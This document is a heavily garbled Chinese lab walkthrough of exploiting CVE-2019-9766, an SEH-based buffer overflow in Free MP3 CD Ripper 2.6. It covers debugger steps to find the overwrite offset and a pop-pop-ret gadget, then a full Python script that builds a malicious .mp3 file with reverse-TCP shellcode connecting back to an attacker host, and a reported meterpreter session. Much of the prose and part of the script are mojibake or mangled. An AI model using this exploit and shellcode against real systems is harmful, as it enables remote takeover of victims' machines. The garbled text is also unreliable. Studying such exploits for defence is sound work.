CVE-2019-9766免费MP3CD开膛手2aê?1y3ì?£è?èáè?a???′?ê?é£???2??è???URL£ohttps://nvd.nist.gov/vuln/detail/CVE-2019-9766êμ?é?·?3é?í??÷?ú£oKali-Linux-19-2019-2019??±ê?÷ú£oCN_Windows7_x86_sp1èí?t°?±?£oFreeMP3CDRipper2.6é??°1¤??WinDbgx86-v6.12.2.633python-2.7.15ImmunityDebugger1.85êμ?é2??è1。?é?¤???o3???ò?3????′(1)í¨1ypythonéú3é×??¨ò?μ?.mp3è??t£??aà???10000??×?·?A×a?3é.mp3è??t£?′ú??è????Dú(2)K′DFmcrExploit.py£?éú3éTestFMCR.mp3è??t£?è??í?èùê?£o(3)??TestFMCR.mp3?′??μ???±ê?÷?ú£?′òa免费MP3CD开膛手£??ù′òaWinDbg£?2¢??windbg时间??ó/fcrip.exe(免费mp3cdcdripperμμ???3?′De?üá?g£??éò??′μ?3ìDò·¢éúá?òì3£?è??aí?ùêccio(6)?ù′??′??üá?!Exchain£?2é'′Shá′e??êêê?£oo°°··?££?2¢?òó?10000??×??A3é1||?2??áèSEH?£2。1)2)ó???è?±?ì???FmcrExploit.py?Dμ?”A”*10000£???′2??è1.2£?éú3éTestFMCR.mp3è??t;(3)???′2??è1.3、1.4、1.5oí1。6£?·¢??指向下一条SEH记录的指针±?0×46326846?2??£?è???í?èùê?£o(4)í¨1y0×46326846?¨a3ìDòμ?ò?3?μ?£?éò??aμà?·òaìììììì1到下一条SEH记录£???ì?è??£(5)?é?¤2.4?Dμ?μ?ê?·??yè·£???FmcrExploit.py?Dμ?buffer?ó?μèa”A”*4116£?2??Té?1£?2???1.mp3???t£?????μ±±í?÷?ú;(6)?ú?±é?÷?u?e′ò'aimmunitydebugger1.85£???frefreboardmp3cdripper£?convert2?eéú3é?£?£o?éò??′μ?4116??×?·?A?yo??2??μ?áè指向下一条SEH记录的指针£??¨ò?|££(7)指向下一条SEH记录的指针(?ò3ènseh)£???ê??òò???seHAUT??SEH?á。??nop??á?oíò???4×??úμ?seh′|àí3ìDòμ??·£?è?oó??è?nop??á???£???DD??è?shellcode?£(8)±?ày?D?ò??òa?áo?ê1ó?sehó?nseh£?2??ü1?íê3éò?3?1¥?÷1?è?2á3?£ìo(9)?°poppopretèìá-á讯?活动£°?°2×°??????)??£?ú???òμ?è???ò?ì?ò?¢£o?éò??′μ??a??poppopret??á?Dòá?£???ó|μ?ê?èí?t×?′?μttttt×?′?μttttttFile(C:?s)文件开膛手\ogg.dll)。x84\x20\xe4\x66″?£213?£ocpu?Dμ??·êy?Yμ??3Dòoíí?????′??íμ?μ??·?3Dò?à·′£?′?ê±CPU?Dμ?μ??·ê?Y?a“0x66e42084”£????′í??????íDèòa°′“0x8420e8′2°e8′ò°′èíμ??·êy?Y?£(11)?¨??ò???shellcode£??aà?|ò????×÷ò???·′?òTCPá??óμ?shellcode£?2ù×÷è??£o(12)′ó2.11?D?′éò£££éminshellcode?a341×??ú£?eeè不讯?。ê??á1úèà£??ú??ò?2?·?)£o040AFEBC040AFEE8èt.PointertonextSEHrecord040AFEC0004955CB?UI.SEhandler040AFEC4040AFED4?t.......040AFEE4|00492C1A,I.RETURNtofcrip.00492C1A040AFEE8|040AFF24$?.Pointertonext4AFSEH2009$2092.0EECChandler.004.SEHrecord009|....040AFFC4|FFFFFFFF????EndofSEHchain040AFFC8|7769E0EDíàiwSEhandler......040AFFF4004047F4?G@.fcrip.004047F4040AFFF801483044D0H040AFFFC00000000....0x040AFFFC-0x040AFEC4=0×138£?????3éê?????ê?312£????′?o3???μ?′óD??íê?312+4=316×??ú£???è?316×??ú???′??·?2???341×??úμ?shellcode?£(13)μ?′è?íTT·¨?ìD???è¥áè?e?°ì·¨×ü±èà§???à°?£?èò???éò?3¢ê?°?shellcode??D?|?£?2ù×÷è???£o?éò??′ó?£??ùyy?????a283×??ú£??ü1?íêè?·?è??o3???áè?£(14)??×üò?é?2ù×÷£?±à?FmcrExploit.py£?′ú??è??£o#Stack-basedbufferoverflowinFreeMP3CDRipper2.6buffer="A"*4="116NSEH\xeb\x06\x90\x90"SEH="\x84\x20\xe4\x66"nops="\x90"*5buf=""buf+="\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"buf+="\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"buf+="\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"buf+="\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"buf+="\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"buf+="\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"buf+="\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"buf+="\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"buf+="\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"buf+="\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"buf+="\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"buf+="\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"buf+="\x68\x02\x00\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"buf+="\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"buf+="\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"buf+="\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"buf+="\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"buf+="\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"buf+="\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"pad="B"*(316-len(nops)-len(buf))有效负载=buffer+NSEH+SEH+nops+buf+padtry:f=open("TestFMCR.mp3","w")print"[+]Creating%sbytesmp3File..."%len(payload)f.write(payload)f.close()print"[+]mp3Filecreatedsuccessfully!"except:print"Filecannotbecreated!"3.é?í??£?é2aê?(1)?úKaliμ?msfconsole?Dè??ˉ?ììy?è£?μè′y??±ê?÷?úé???£?2ù×÷è??í?èùê?£(2)??CRYê?£(2)??CRYêê£(2)??CRYêê?°.mp3ê?t??±′μ???±ê?÷£?′òaFreeMP3CDRipper£?Convert??mp3è??t£?è?ometerpretersession3é1|?¨á¢£?è???í?èùê?£o?á′t£?????FreeMP32.6CDRipper?NSAμ?èí?t???ò1¤3ì?á±?????μ?êy?YTP-Link2???ó|£?°2è?1¤3ìê|1?aáè???·óé?÷???′
